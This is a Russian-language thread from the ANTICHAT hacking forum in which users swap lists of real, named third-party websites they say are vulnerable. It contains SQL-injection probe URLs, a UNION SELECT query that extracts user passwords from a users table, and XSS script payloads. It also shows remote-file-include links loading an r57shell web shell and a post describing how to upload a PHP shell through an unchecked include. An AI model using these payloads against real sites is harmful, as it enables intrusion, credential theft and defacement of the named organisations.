ANTICHAT — форум по информационной безопасности, OSINT и технологиям

http://www.amira-toys.ru/show_cart.php?new=3101&catid=24&PHPSESSID=d079c686 5f941a8648a9007892607398'

http://www.autozap4asti.ru/parts.php?task=showTree&carid=525&mod=246&typeid=8 902'

http://www.stails.ru/index.php?id=6&PHPSESSID=2d6748571c1e52b2071cb3fa7 b18d9aa'

http://www.upk1.ru/index.php?id=15&add=1&parent_id=22'

http://test.fanfics.ru/index.php?section=3&id=221'

http://www.utravel.ru/search.php?pin=1133872666&tourid=74'

http://minagro.gov.ua/sgbazi/zr/protect.php3?id=3'

http://www.komfarm.by/press-centre.php?page=1&id=27&Show=0'

http://www.kalitka-plitka.ru/catalog/?id=16&sub=32&stuff=28&PHPSESSID=e290f7c002397d6fa 05d621d31948b26'

http://www.mail.zp.ua/action.php?action=aff_mail&mail=1&sort=1&folder=IN BOX&sortdir=1&lang='

Какой-то левый ТИПА инклуд. Хер поймёшь. В этой строке есть ещё пару уязвимых параметров, но они ничего не дают. Тока ошипку.

Бля да шо вы за народ уже мою почту дефейсите вообще наглёж =(

Вот нашел сайт с тестом типа
(Хочешь узнать кое-что про себя? )
ну я в ответы поставил.
'><script>alert('HakNet')</script>
проходит не фильтруетса..
сайт http://www.mostinfo.net/hlam/test/

Нашёл сайт рекламного агенства hxxp://www.proreklamy.ru/. Между прочих услуг есть создание сайта от 500$ и до 1500$. "Ого", - подумал я и решил поискать sql в запросе hxxp://www.proreklamy.ru/?module=custompage&id=6. И что вы думаете? Скрипт инклудит страницу custompage.php без каких-либо проверок!!! Заливаем на народ шелл с расширением php и подставляем в урл - всё, у нас шелл!!! И так сделано большинство их сайтов за 500-1500 зелёных! Я уже молчу про strict'ы или хотя бы transitional - там НЕТ декларации вовсе!
Вывод: главное - PR, а остальное - ничто!

__http://www.dunas.com.br/ing/main.php?inc=filo
__http://www.rus-fish.ru/?pg=xxx
__http://85.10.200.53/imat-uve.de/main.php?inc=%27

__http://pad.chasesdream.com/orion/downloads.php?cat=1%20UNION%20SELECT%200,user_pass word,0,0,0,0,0,0,0%20FROM%20orion_users%20WHERE%20 user_id=2/*

http://www.kalina-shanson.com/smi/show.php?id=2'0

http://www.sbsonline.org/publication...u/r57shell.php

http://www.opitz.pl/body.php?txt=htt...u/r57shell.php

http://www.papunet.net/bliss/index.php?pid=246%27
http://www.papunet.net/yleis/txt/tyo...kki_oma.php%27

http://www.fitzmuseum.cam.ac.uk/opac...ctnames.php%27


http://www.airis.ru/mpage.php?pgname...page.php&text=

http://www.clubnews.ru/forum/profile...e=sendpassword

http://www.emal.kanash.ru/?dir=http:...nm.ru/r57shell

__________________

XSS на pages.ru (интересно, а кто-нибудь с АЧата на нём хостится ):

_http://www.pages.ru/search.html?text=%3Cscript%3Ealert%28%2Fback0rific e%2F%29%3C%2Fscript%3E&doSearch=%CD%E0%E9%F2%E8 - тройной alert() не хотели, хех ?!

Кто-нибудь юзает качалку GetRight? Тогда - держите XSS и не отрывайтесь:

_http://www.headlightinc.com/cgi-bin/faq.cgi?filter=%3Cscript%3Ealert%28%2Fback0rifice% 2F%29%3C%2Fscript%3E&submit1=Search